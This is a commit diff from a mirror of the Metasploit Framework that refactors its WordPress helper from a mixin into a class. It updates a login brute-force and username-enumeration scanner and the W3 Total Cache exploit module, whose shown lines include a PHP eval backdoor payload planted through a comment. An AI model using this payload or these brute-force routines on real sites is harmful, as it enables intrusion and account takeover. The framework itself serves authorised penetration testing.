infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

wordpress is now a module, not a mixin

bug/bundler_fix
Christian Mehlmauer 2013-08-22 00:05:58 +02:00
parent 0a2bf9e9e7
commit 009d8796f6
5 changed files with 46 additions and 41 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/http/wordpress.rb Normal file
View File

@ -0,0 +1,2 @@
# -*- coding: binary -*-
require 'http/wordpress/wordpress_base'

47
lib/msf/core/exploit/wordpress.rb → lib/http/wordpress/wordpress_base.rb
View File

@ -1,22 +1,19 @@
# -*- coding: binary -*-
module Msf
###
#
# This module provides a way of interacting with wordpress installations
#
###
module Exploit::Remote::Wordpress
include Exploit::Remote::HttpClient
def initialize(info = {})
super
module HTTP
class Wordpress
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the wordpress application', '/']),
], Exploit::Remote::Wordpress
)
# initializes a new Wordpress instance
#
# @param client The Metasploit module instance
def initialize(client)
@client = client
end
# Checks if the site is online and running wordpress
@ -24,9 +21,9 @@ module Msf
# @return [Boolean] Returns true if the site is online and running wordpress
def wordpress_and_online?
begin
res = send_request_cgi({
res = @client.send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri)
'uri' => @client.normalize_uri(@client.target_uri)
}, 20)
if res and res.code == 200
if res.body =~ /["'][^"']*\/wp-content\/[^"']*["']/i or
@ -39,7 +36,7 @@ module Msf
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
print_error("Error connecting to #{target_uri}")
print_error("Error connecting to #{@client.target_uri}")
return false
end
@ -50,7 +47,7 @@ module Msf
#
# @return [String] Wordpress Login URL
def wordpress_uri_login
normalize_uri(target_uri.path, 'wp-login.php')
@client.normalize_uri(@client.target_uri.path, 'wp-login.php')
end
# Returns the Wordpress Post URL
@ -58,7 +55,7 @@ module Msf
# @param post_id Post ID
# @return [String] Wordpress Post URL
def wordpress_url_post(post_id)
normalize_uri(target_uri.path) + "/?p=#{post_id}"
@client.normalize_uri(@client.target_uri.path) + "/?p=#{post_id}"
end
# Returns the Wordpress Author URL
@ -66,7 +63,7 @@ module Msf
# @param author_id Author ID
# @return [String] Wordpress Author URL
def wordpress_url_author(author_id)
normalize_uri(target_uri.path) + "/?author=#{author_id}"
@client.normalize_uri(@client.target_uri.path) + "/?author=#{author_id}"
end
# performs a wordpress login
@ -75,8 +72,8 @@ module Msf
# @param pass Password
# @return [String] the session cookie on successful login, nil otherwise
def wordpress_login(user, pass)
redirect = "#{target_uri}#{Rex::Text.rand_text_alpha(8)}"
res = send_request_cgi({
redirect = "#{@client.target_uri}#{Rex::Text.rand_text_alpha(8)}"
res = @client.send_request_cgi({
'method' => 'POST',
'uri' => wordpress_uri_login,
'data' => wordpress_helper_login_post_data(user, pass, redirect),
@ -97,7 +94,7 @@ module Msf
# @param user Username
# @return [Boolean] true if the user exists
def wordpress_user_exists?(user)
res = send_request_cgi({
res = @client.send_request_cgi({
'method' => 'POST',
'uri' => wordpress_uri_login,
'data' => wordpress_helper_login_post_data(user, 'x'),
@ -121,7 +118,7 @@ module Msf
# @return [String] the Username if it exists, nil otherwise
def wordpress_userid_exists?(user_id)
url = wordpress_url_author(user_id)
res = send_request_cgi({
res = @client.send_request_cgi({
'method' => 'GET',
'uri' => url
})
@ -133,14 +130,14 @@ module Msf
return $1
end
uri = "#{uri.path}?#{uri.query}"
res = send_request_cgi({
res = @client.send_request_cgi({
'method' => 'GET',
'uri' => uri
})
end
if res.nil?
print_error("#{target_uri} - Error getting response.")
print_error("#{@client.target_uri} - Error getting response.")
elsif res.code == 200 and
(res.body =~ /href="http[s]*:\/\/.*\/\?*author.+title="([[:print:]]+)" /i or
res.body =~ /<body class="archive author author-(?:[^\s]+) author-(?:\d+)/i)
@ -235,12 +232,12 @@ module Msf
}) unless login_cookie
options = {
'uri' => normalize_uri(target_uri.path, 'wp-comments-post.php'),
'uri' => @client.normalize_uri(@client.target_uri.path, 'wp-comments-post.php'),
'method' => 'POST'
}
options.merge!({'vars_post' => vars_post})
options.merge!({'cookie' => login_cookie}) if login_cookie
res = send_request_cgi(options)
res = @client.send_request_cgi(options)
if res and res.code == 302
location = URI(res.headers['Location'])
return location
@ -276,7 +273,7 @@ module Msf
'uri' => uri
}
options.merge!({'cookie' => login_cookie}) if login_cookie
res = send_request_cgi(options)
res = @client.send_request_cgi(options)
# post exists
if res and res.code == 200
# also check if comments are enabled

1
lib/msf/core/exploit/mixins.rb
View File

@ -95,4 +95,3 @@ require 'msf/core/exploit/winrm'
# WebApp
require 'msf/core/exploit/web'
require 'msf/core/exploit/wordpress'

15
modules/auxiliary/scanner/http/wordpress_login_enum.rb
View File

@ -5,9 +5,10 @@
# http://metasploit.com/
##
class Metasploit3 < Msf::Auxiliary
require 'http/wordpress'
include Msf::Exploit::Remote::Wordpress
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
@ -35,6 +36,7 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the wordpress application', '/']),
OptBool.new('VALIDATE_USERS', [ true, 'Validate usernames', true ]),
OptBool.new('BRUTEFORCE', [ true, 'Perform brute force authentication', true ]),
OptBool.new('ENUMERATE_USERNAMES', [ true, 'Enumerate usernames', true ]),
@ -45,8 +47,9 @@ class Metasploit3 < Msf::Auxiliary
end
def run_host(ip)
@wordpress = HTTP::Wordpress.new(self)
unless wordpress_and_online?
unless @wordpress.wordpress_and_online?
fail_with(Failure::NoTarget, "#{target_uri} does not seeem to be Wordpress site")
end
@ -102,7 +105,7 @@ class Metasploit3 < Msf::Auxiliary
def do_enum(user=nil)
print_status("#{target_uri} - WordPress Enumeration - Checking Username:'#{user}'")
exists = wordpress_user_exists?(user)
exists = @wordpress.wordpress_user_exists?(user)
if exists
print_good("#{target_uri} - WordPress Enumeration- Username: '#{user}' - is VALID")
report_auth_info(
@ -125,7 +128,7 @@ class Metasploit3 < Msf::Auxiliary
def do_login(user=nil, pass=nil)
vprint_status("#{target_uri} - WordPress Brute Force - Trying username:'#{user}' with password:'#{pass}'")
cookie = wordpress_login(user, pass)
cookie = @wordpress.wordpress_login(user, pass)
if cookie
print_good("#{target_uri} - WordPress Brute Force - SUCCESSFUL login for '#{user}' : '#{pass}'")
@ -148,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary
def enum_usernames
usernames = []
for i in datastore['RANGE_START']..datastore['RANGE_END']
username = wordpress_userid_exists?(i)
username = @wordpress.wordpress_userid_exists?(i)
if username
print_good "#{target_uri} - Found user '#{username}' with id #{i.to_s}"
usernames << username

22
modules/exploits/unix/webapp/php_wordpress_total_cache.rb
View File

@ -5,12 +5,12 @@
# http://metasploit.com/
##
require 'msf/core'
require 'http/wordpress'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Wordpress
Rank = ExcellentRanking
def initialize(info = {})
super(update_info(info,
@ -57,6 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the wordpress application', '/']),
OptInt.new('POSTID', [ false, "The post ID where publish the comment" ]),
OptString.new('USERNAME', [ false, "The user to authenticate as (anonymous if username not provided)"]),
OptString.new('PASSWORD', [ false, "The password to authenticate with (anonymous if password not provided)" ])
@ -82,9 +83,9 @@ class Metasploit3 < Msf::Exploit::Remote
php_payload = "<!--mfunc if (sha1($_SERVER[HTTP_SUM]) == '#{@sum}' ) { eval(base64_decode($_SERVER[HTTP_CMD])); } --><!--/mfunc-->"
if @auth
uri = wordpress_post_comment_auth(php_payload, @post_id, @cookie)
uri = @wordpress.wordpress_post_comment_auth(php_payload, @post_id, @cookie)
else
uri = wordpress_post_comment_no_auth(php_payload,
uri = @wordpress.wordpress_post_comment_no_auth(php_payload,
@post_id,
rand_text_alpha(8),
"#{rand_text_alpha(3)}@#{rand_text_alpha(3)}.com",
@ -95,8 +96,9 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
@wordpress = HTTP::Wordpress.new(self)
unless wordpress_and_online?
unless @wordpress.wordpress_and_online?
fail_with(Failure::NoTarget, "#{peer} does not seeem to be Wordpress site")
end
@ -104,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
if @auth
print_status("#{peer} - Trying to login...")
@cookie = wordpress_login(@user, @password)
@cookie = @wordpress.wordpress_login(@user, @password)
if @cookie.nil?
fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful")
end
@ -117,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Using the user supplied POST ID #{@post_id}...")
else
print_status("#{peer} - Trying to brute force a valid POST ID...")
@post_id = wordpress_get_valid_post_id_with_comments_enabled
@post_id = @wordpress.wordpress_get_valid_post_id_with_comments_enabled
if @post_id.nil?
fail_with(Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment")
else
@ -151,7 +153,9 @@ class Metasploit3 < Msf::Exploit::Remote
end
def check
unless wordpress_and_online?
@wordpress = HTTP::Wordpress.new(self)
unless @wordpress.wordpress_and_online?
print_error("#{peer} does not seeem to be Wordpress site")
return Exploit::CheckCode::Unknown
end